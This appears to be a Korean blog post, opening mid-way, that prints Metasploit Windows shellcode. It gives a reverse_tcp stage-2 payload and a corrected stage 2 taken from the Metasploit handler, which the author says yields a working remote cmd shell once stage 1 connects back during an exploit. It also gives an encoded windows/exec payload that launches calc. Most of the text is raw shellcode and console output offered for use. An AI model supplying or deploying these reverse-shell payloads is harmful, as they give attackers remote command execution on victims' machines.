"\xc9\x15\x5a\xdf\x36\x5f\xd7\x2b\xcc\x5e\x31\x62\x2d\x51"  
"\x7d\x28\x10\x5d\x70\x31\x54\x5a\x6b\x44\xae\x98\x16\x5e"  
"\x75\xe2\xcc\xeb\x68\x44\x86\x4b\x49\x74\x4b\x0d\x1a\x7a"  
"\x20\x5a\x44\x9f\xb7\x8f\xfe\x9b\x3c\x2e\xd1\x2d\x06\x14"  
"\xf5\x76\xdc\x35\xac\xd2\xb3\x4a\xae\xbb\x6c\xee\xa4\x2e"  
"\x78\x88\xe6\x26\x4d\xa6\x18\xb7\xd9\xb1\x6b\x85\x46\x69"  
"\xe4\xa5\x0f\xb7\xf3\xca\x25\x0f\x6b\x35\xc6\x6f\xa5\xf2"  
"\x92\x3f\xdd\xd3\x9a\xd4\x1d\xdb\x4e\x7a\x4e\x73\x21\x3a"  
"\x3e\x33\x91\xd2\x54\xbc\xce\xc2\x56\x16\x67\x68\xac\xf1"  
"\x48\xc4\xae\x03\x21\x16\xaf\x1d\xd0\x9f\x49\x4b\x02\xc9"  
"\xc2\xe4\xbb\x50\x98\x95\x44\x4f\xe4\x96\xcf\x63\x18\x58"  
"\x38\x0e\x0a\x0d\xc8\x45\x70\x98\xd7\x70\x1f\x25\x42\x7e"  
"\xb6\x72\xfa\x7c\xef\xb5\xa5\x7f\xda\xcd\x6c\x15\xa5\xb9"  
"\x90\xf9\x25\x3a\xc7\x93\x25\x52\xbf\xc7\x75\x47\xc0\xd2"  
"\xe9\xd4\x55\xdc\x5b\x88\xfe\xb4\x61\xf7\xc9\x1b\x99\xd2"  
"\xcb\x60\x4c\x1b\x4e\x90\xfa\x4f\x92"

# windows/shell/reverse_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"  
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"  
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"  
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"  
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"  
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"  
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"  
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"  
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"  
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"  
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"  
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"  
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"  
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"  
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"  
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"  
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"  
"\xff\xd5"


이번에 reverse_tcp를 고른이유는 또 다른 이유가 있습니다.


바로 일부가 약간 잘못되서 삽질좀 했습니다. 그래서 다른분은 삽질 하지말라고 이 쉘코드를 선택했습니다.




metasploit의 handler를 이용하여 쉘코드를 사용하면 상관없지만, metasploit을 이용하지 않을때 약간 문제가 발생합니다.


일단 reverse_tcp는 2부분으로 나뉘는데 stage1은 클라이언트가 서버에 연결하는 쉘코드이고 stage2는 server가 client에 cmd shell을 열도록 하는 명령어입니다.


그런데 위에 나온 stage2는 이유를 모르겠지만 작동이 되지 않더군요..


몇시간동안 삽질 삽질을 하면서 알아낸결과 저 stage2의 값은 버리고 아래 코드를 사용하면 됩니다.


metasploit의 handler에서 reverse_tcp payload를 사용할때 stage2를 전송하는데 이때 사용하는 값이랑 위에 나온 stage2와는 약간 다르더군요


그래서 handler 에서 전송하는 stage2를 사용하시면 되겠습니다.


한줄로 요약해서 reverse_tcp를 사용할땐 위 stage2값을 사용하지말고 아래 코드를 사용하시길 바랍니다.


#stage 2 [metasploit handler_windows/shell/reverse_tcp]

"\xF0\x00\x00\x00\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64"

"\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26"

"\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7"

"\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85"

"\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C"

"\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7"

"\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24"

"\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0"

"\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B"

"\x12\xEB\x86\x5D\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6"

"\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24"

"\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56"

"\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08"

"\x87\x1D\x60\xFF\xD5\xBB\xF0\xB5\xA2\x56\x68\xA6\x95\xBD\x9D\xFF"

"\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A"

"\x00\x53\xFF\xD5"


다시한번 말씀드리면 reverse_tcp는 stage1은 취약점 공격할때에 사용하시고, stage2는 2차로 서버에서 클라이언트로 전송하는 값입니다.


stage1 사용으로 클라이언트가 서버에 연결하면 위 코드를 전송하시면 성공적으로 쉘이 붙는것을 보실 수 있을겁니다.


저와 같이 삽질을 하는 분들에게 도움이 되길 바라며.. ㅋㅋ




자.. 그러면 계산기를 띄우는 쉘코드를 다시한번 만들어보겠습니다.


간단하게 텍스트로만 적어보겠습니다.


msf > use windows/exec
msf  payload(exec) > show options

Module options (payload/windows/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf  payload(exec) > set cmd calc
cmd => calc
msf  payload(exec) > generate -b '\xff\x00'
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, EXITFUNC=process, CMD=calc
buf = 
"\xdb\xca\xd9\x74\x24\xf4\x5b\xba\x23\xf7\xca\x19\x2b\xc9"  
"\xb1\x32\x31\x53\x17\x03\x53\x17\x83\xc8\x0b\x28\xec\xf2"  
"\x1c\x24\x0f\x0a\xdd\x57\x99\xef\xec\x45\xfd\x64\x5c\x5a"  
"\x75\x28\x6d\x11\xdb\xd8\xe6\x57\xf4\xef\x4f\xdd\x22\xde"  
"\x50\xd3\xea\x8c\x93\x75\x97\xce\xc7\x55\xa6\x01\x1a\x97"  
"\xef\x7f\xd5\xc5\xb8\xf4\x44\xfa\xcd\x48\x55\xfb\x01\xc7"  
"\xe5\x83\x24\x17\x91\x39\x26\x47\x0a\x35\x60\x7f\x20\x11"  
"\x51\x7e\xe5\x41\xad\xc9\x82\xb2\x45\xc8\x42\x8b\xa6\xfb"  
"\xaa\x40\x99\x34\x27\x98\xdd\xf2\xd8\xef\x15\x01\x64\xe8"  
"\xed\x78\xb2\x7d\xf0\xda\x31\x25\xd0\xdb\x96\xb0\x93\xd7"  
"\x53\xb6\xfc\xfb\x62\x1b\x77\x07\xee\x9a\x58\x8e\xb4\xb8"  
"\x7c\xcb\x6f\xa0\x25\xb1\xde\xdd\x36\x1d\xbe\x7b\x3c\x8f"  
"\xab\xfa\x1f\xc5\x2a\x8e\x25\xa0\x2d\x90\x25\x82\x45\xa1"  
"\xae\x4d\x11\x3e\x65\x2a\xed\x74\x24\x1a\x66\xd1\xbc\x1f"  
"\xeb\xe2\x6a\x63\x12\x61\x9f\x1b\xe1\x79\xea\x1e\xad\x3d"  
"\x06\x52\xbe\xab\x28\xc1\xbf\xf9\x4a\x84\x53\x61\x8d"


긴글 읽으시느라 수고 많으셨습니다.


감사합니다 :D

신고

Comment 5